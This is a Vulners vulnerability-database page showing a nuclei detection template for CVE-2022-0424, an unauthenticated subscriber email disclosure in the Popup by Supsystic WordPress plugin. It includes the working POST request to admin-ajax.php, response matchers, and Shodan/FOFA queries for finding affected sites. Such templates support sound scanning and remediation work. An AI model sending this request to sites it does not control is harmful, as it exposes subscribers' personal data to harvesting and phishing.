Lucene search
K

Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure in WordPres

Related
Refs
Code
id: CVE-2022-0424

info:
  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
  author: s4e-io
  severity: medium
  description: |
    The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
  impact: |
    Unauthenticated attackers can obtain email addresses of all subscribed users via an unprotected AJAX endpoint, potentially facilitating phishing campaigns or spam attacks.
  remediation: Fixed in 1.10.9
  reference:
    - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0424
    cwe-id: CWE-306
    epss-score: 0.0269
    epss-percentile: 0.84025
    cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: supsystic
    product: popup
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/popup-by-supsystic
    fofa-query: body=/wp-content/plugins/popup-by-supsystic
    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
  tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"id":"'
          - 'username":"'
          - 'email":'
          - 'hash":"'
          - "_wpnonce"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206910dc96ddd6c2b6f51fad10571c53c196bca3b633fe91bfe155d2b3cbc78c7d022077b62da3f5470eb8b786dd1ffd276f1833bf18fbebb9551bd8845b30577ff487:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 25
CVSS 3.15.3
EPSS0.0269
21